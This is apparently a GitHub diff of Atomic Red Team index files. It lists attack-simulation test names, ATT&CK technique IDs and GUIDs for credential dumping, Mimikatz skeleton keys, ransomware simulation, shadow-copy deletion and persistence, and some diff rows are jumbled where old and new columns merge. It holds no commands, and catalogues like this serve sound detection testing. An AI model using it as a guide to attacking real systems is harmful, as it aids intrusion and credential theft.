collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
@@ -1262,7 +1249,6 @@ credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC cal
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -1272,8 +1258,6 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1345,8 +1329,6 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directo
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
discovery,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
@@ -1424,8 +1406,7 @@ discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available
discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
@@ -1516,7 +1497,6 @@ impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-49
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
@@ -1531,7 +1511,6 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
@@ -1544,7 +1523,6 @@ initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Ena
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1659,Content Injection,2,MITM Proxy Injection (Windows),dcc2ca85-a21c-43a4-acc7-7314d4e5891c,powershell
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
394 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
395 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
396 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
defense-evasion T1027 Obfuscated Files or Information 11 Obfuscated PowerShell Command via Character Array 6683baf0-6e77-4f58-b114-814184ea8150 powershell
397 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
398 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
399 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
427 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
428 defense-evasion T1564.003 Hide Artifacts: Hidden Window 2 Headless Browser Accessing Mockbin 0ad9ab92-c48c-4f08-9b20-9633277c4646 command_prompt
429 defense-evasion T1564.003 Hide Artifacts: Hidden Window 3 Hidden Window-Conhost Execution 5510d22f-2595-4911-8456-4d630c978616 powershell
defense-evasion T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
430 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
431 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
432 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
649 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
650 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
651 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
privilege-escalation T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
652 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
653 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
654 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
808 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
809 persistence T1505.005 Server Software Component: Terminal Services DLL 2 Modify Terminal Services DLL Path 18136e38-0530-49b2-b309-eed173787471 powershell
810 persistence T1176 Browser Extensions 1 Chrome/Chromium (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
811 persistence T1176 Browser Extensions 2 Firefox Chrome/Chromium (Chrome Web Store) cb790029-17e6-4c43-b96f-002ce5f10938 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
812 persistence T1176 Browser Extensions 3 Edge Chromium Addon - VPN Firefox 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 cb790029-17e6-4c43-b96f-002ce5f10938 manual
813 persistence T1176 Browser Extensions 4 Google Chrome Load Unpacked Extension With Command Line Edge Chromium Addon - VPN 7a714703-9f6b-461c-b06d-e6aeac650f27 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 powershell manual
814 persistence T1137.005 T1176 Office Application Startup: Outlook Rules Browser Extensions 1 5 Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object Google Chrome Load Unpacked Extension With Command Line ffadc988-b682-4a68-bd7e-4803666be637 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 2 Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object bddfd8d4-7687-4971-b611-50a537ab3ab4 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 3 Outlook Rule - Auto-Forward Emails to External Address via COM Object b0bd3d76-a57c-4699-83f4-8cd798dd09bd powershell
persistence T1137.005 Office Application Startup: Outlook Rules 4 Outlook Rules - Enumerate Existing Rules via PowerShell COM Object 5ff5249a-5807-480e-ab52-c430497a8a25 powershell
persistence T1137.005 Office Application Startup: Outlook Rules 5 Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) cb814cf8-24f2-41dc-a1cd-1c2073276d4a powershell
815 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
816 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
817 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
995 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
996 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
997 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 1 Python Startup Hook - atomic_hook.pth (Windows) 57289962-21dc-4501-b756-80cd30608d9f powershell
persistence T1546.018 Event Triggered Execution: Python Startup Hooks 2 Python Startup Hook - usercustomize.py (Windows) 05cc7a2c-ce32-46f2-a358-f27f76718c39 powershell
998 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
999 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
1000 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
1001 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
1002 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
1003 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
persistence T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1004 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
1005 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
1006 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
1034 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1035 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1036 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
command-and-control T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1037 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1038 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1039 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1089 collection T1113 Screen Capture 7 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1090 collection T1113 Screen Capture 8 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1091 collection T1113 Screen Capture 9 Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted 5a496325-0115-4274-8eb9-755b649ad0fb powershell
collection T1113 Screen Capture 10 RDP Bitmap Cache Extraction via bmc-tools 98f19852-7348-4f99-9e15-6ff4320464c7 powershell
1092 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1093 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
1094 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
1249 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1250 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1251 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
credential-access T1556.001 Modify Authentication Process: Domain Controller Authentication 1 Skeleton Key via Mimikatz 0ee8081f-e9a7-4a2e-a23f-68473023184f powershell
1252 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1253 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1254 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1258 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1259 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1260 credential-access T1003.003 OS Credential Dumping: NTDS 9 Create Volume Shadow Copy with diskshadow b385996c-0e7d-4e27-95a4-aca046b119a7 command_prompt
credential-access T1003.003 OS Credential Dumping: NTDS 10 Copy NTDS in low level NTFS acquisition via MFT parsing f57cb283-c131-4e2f-8a6c-363d575748b2 powershell
credential-access T1003.003 OS Credential Dumping: NTDS 11 Copy NTDS in low level NTFS acquisition via fsutil c7be89f7-5d06-4321-9f90-8676a77e0502 powershell
1261 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1262 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1263 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1329 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1330 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1331 discovery T1007 System Service Discovery 4 Get-Service Execution 51f17016-d8fa-4360-888a-df4bf92c4a04 command_prompt
discovery T1007 System Service Discovery 6 System Service Discovery - Windows Scheduled Tasks (schtasks) 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a command_prompt
discovery T1007 System Service Discovery 7 System Service Discovery - Services Registry Enumeration d70d82bd-bb00-4837-b146-b40d025551b2 powershell
1332 discovery T1040 Network Sniffing 4 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1333 discovery T1040 Network Sniffing 5 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1334 discovery T1040 Network Sniffing 6 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1406 discovery T1083 File and Directory Discovery 9 Recursive Enumerate Files And Directories By Powershell 95a21323-770d-434c-80cd-6f6fbf7af432 powershell
1407 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1408 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1409 discovery T1049 System Network Connections Discovery 3 4 System Network Connections Discovery via PowerShell (Process Mapping) System Discovery using SharpView b52c8233-8f71-4bd7-9928-49fec8215cf5 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
discovery T1049 System Network Connections Discovery 7 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1410 discovery T1654 Log Enumeration 1 Get-EventLog To Enumerate Windows Security Log a9030b20-dd4b-4405-875e-3462c6078fdc powershell
1411 discovery T1654 Log Enumeration 2 Enumerate Windows Security Log via WevtUtil fef0ace1-3550-4bf1-a075-9fea55a778dd command_prompt
1412 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1497 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1498 impact T1486 Data Encrypted for Impact 9 Data Encrypt Using DiskCryptor 44b68e11-9da2-4d45-a0d9-893dabd60f30 command_prompt
1499 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
impact T1496 Resource Hijacking 2 Windows - Simulate CPU Load with PowerShell 44315fb0-f78d-4cef-b10f-cf21c1fe2c75 powershell
1500 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1501 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1502 impact T1485 Data Destruction 5 ESXi - Delete VM Snapshots 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 command_prompt
1511 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1512 impact T1490 Inhibit System Recovery 10 Windows - vssadmin Resize Shadowstorage Volume da558b07-69ae-41b9-b9d4-4d98154a7049 powershell
1513 impact T1490 Inhibit System Recovery 11 Modify VSS Service Permissions a4420f93-5386-4290-b780-f4f66abc7070 command_prompt
impact T1490 Inhibit System Recovery 13 Windows - Delete Volume Shadow Copies via Diskshadow 42111a6f-7e7f-482c-9b1b-3cfd090b999c powershell
1514 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1515 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1516 impact T1529 System Shutdown/Reboot 12 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1523 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1524 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1525 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
initial-access T1659 Content Injection 2 MITM Proxy Injection (Windows) dcc2ca85-a21c-43a4-acc7-7314d4e5891c powershell
1526 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1527 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1528 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
atomics/Indexes/Indexes-Markdown/containers-index.md
+7 -7
View File
@@ -134,7 +134,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -228,7 +228,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,7 @@
- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
